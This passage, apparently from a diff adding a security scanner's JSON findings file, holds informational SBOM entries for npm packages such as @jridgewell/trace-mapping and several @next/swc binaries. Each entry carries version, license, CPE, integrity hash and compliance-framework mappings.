"Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "17f518740ec1a2d8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @jridgewell/trace-mapping 0.3.31", + "title": "@jridgewell/trace-mapping 0.3.31", + "description": "Package discovered: @jridgewell/trace-mapping 0.3.31", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d2b0bb94bbc32d3e", + "name": "@jridgewell/trace-mapping", + "version": "0.3.31", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace-mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace_mapping:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace-mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@jridgewell\\/trace:\\@jridgewell\\/trace_mapping:0.3.31:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz", + "integrity": "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==", + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "104bcdf3fd6a7ac2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @js-sdsl/ordered-map 4.4.2", + "title": "@js-sdsl/ordered-map 4.4.2", + "description": "Package discovered: @js-sdsl/ordered-map 4.4.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "886fcbec7936d83f", + "name": "@js-sdsl/ordered-map", + "version": "4.4.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered-map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered_map:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js-sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js_sdsl\\/ordered:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js:\\@js-sdsl\\/ordered-map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@js:\\@js_sdsl\\/ordered_map:4.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40js-sdsl/ordered-map@4.4.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", + "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9fea893a2745b477", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/env 14.2.3", + "title": "@next/env 14.2.3", + "description": "Package discovered: @next/env 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "18ad44792e37660e", + "name": "@next/env", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/env:\\@next\\/env:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/env@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz", + "integrity": "sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "258c6f6b4bc11247", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-darwin-arm64 14.2.3", + "title": "@next/swc-darwin-arm64 14.2.3", + "description": "Package discovered: @next/swc-darwin-arm64 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bdb25bdc1adfe20f", + "name": "@next/swc-darwin-arm64", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_arm64:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-darwin-arm64@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz", + "integrity": "sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "297b85bfc16e4adc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-darwin-x64 14.2.3", + "title": "@next/swc-darwin-x64 14.2.3", + "description": "Package discovered: @next/swc-darwin-x64 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b0a8be32ec095ef0", + "name": "@next/swc-darwin-x64", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin-x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin_x64:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_darwin:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-darwin-x64@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz", + "integrity": "sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eaf37f3f72892d80", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-linux-arm64-gnu 14.2.3", + "title": "@next/swc-linux-arm64-gnu 14.2.3", + "description": "Package discovered: @next/swc-linux-arm64-gnu 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b768ca89954904c7", + "name": "@next/swc-linux-arm64-gnu", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_gnu:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz", + "integrity": "sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "27ac7498beafdc1b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @next/swc-linux-arm64-musl 14.2.3", + "title": "@next/swc-linux-arm64-musl 14.2.3", + "description": "Package discovered: @next/swc-linux-arm64-musl 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f485e6463dfab8af", + "name": "@next/swc-linux-arm64-musl", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 